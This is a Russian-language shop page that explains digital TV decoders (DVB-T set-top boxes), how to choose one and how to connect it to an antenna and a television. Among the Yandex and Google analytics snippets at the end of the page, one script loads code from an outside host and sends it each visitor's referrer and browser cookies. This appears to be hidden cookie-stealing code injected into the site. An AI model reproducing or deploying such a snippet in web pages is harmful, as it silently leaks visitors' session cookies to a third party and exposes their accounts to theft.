Декодер для цифрового телевидения
+7(495) 776-73-79 9:00 - 22:00 | Без выходных

Декодер для цифрового телевидения

DVB – цифровое телевидение

Прогресс такими темпами входит в наш быт, что мы не успеваем привыкать к новинкам. Аналоговое телевидение замещается системой с цифровым сигналом, а наши телевизионные приемники не могут его понять. Что же делать? Выбрасывать на свалку любимый и такой дорогой телевизор? Но специалисты, которые обдумывали эту ситуацию и готовились к ней, говорят, что выбрасывать телевизор не надо.

Для приема достаточно установить декодер для цифрового телевидения. Так называют приставки для цифрового телевидения. Еще не так давно, когда наши телевизоры принимали только в метровом диапазоне частот, мы использовали декодеры для приема в дециметровом диапазоне. Теперь для приема нам снова потребуется декодер.

Декодеры преобразовывает цифровой сигнал в такой, который наш телевизор способен распознать. Таких устройств на рынке достаточное количество. Но приобретать надо только тот декодер для цифрового телевидения, который рассчитан на диапазон частот в вашем районе.

Как выбрать?

Когда появляется необходимость покупать, мы часто теряемся в современных терминах. Специалисты считают, что все современные термины доступны для понимания всем остальным. Но это не так.

Обычно для большинства населения достаточно знать – что и где купить. Специальная информация им не нужна. Им не нужны характеристики сигналов, частоты диапазона и тип соединения. Им надо знать название декодера для цифрового телевидения, его цену и место продажи.

Декодер для цифрового телевидения иначе еще называют ресивером. Отличаются эти устройства диапазоном принимаемого сигнала и набором функций. По простой классификации декодеры делятся на те, которые преобразовывают сигналы эфирного телевидения, спутникового и кабельного.

Процедура подключения

Чтобы принимать сигнал обычного наземного передатчика достаточно приобрести декодер для цифрового телевидения типа DVB-T. Он предназначен для работы с самой обычной антенной ДМВ диапазона. Сигнал с антенны подключается к декодеру, а от декодера поступает непосредственно на вход телевизионного приемника.

Большинство таких декодеров работает сразу же после подключения. Инструкция позволяет выполнить подключение и настройку самостоятельно. Кроме основной функции приема сигнала, декодер имеет и другие функции.

Среди таких устройств есть такие, которые позволяют устанавливать карточку для приема других каналов. Это дополнительная услуга, которая предусматривает ежемесячную оплату.



(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);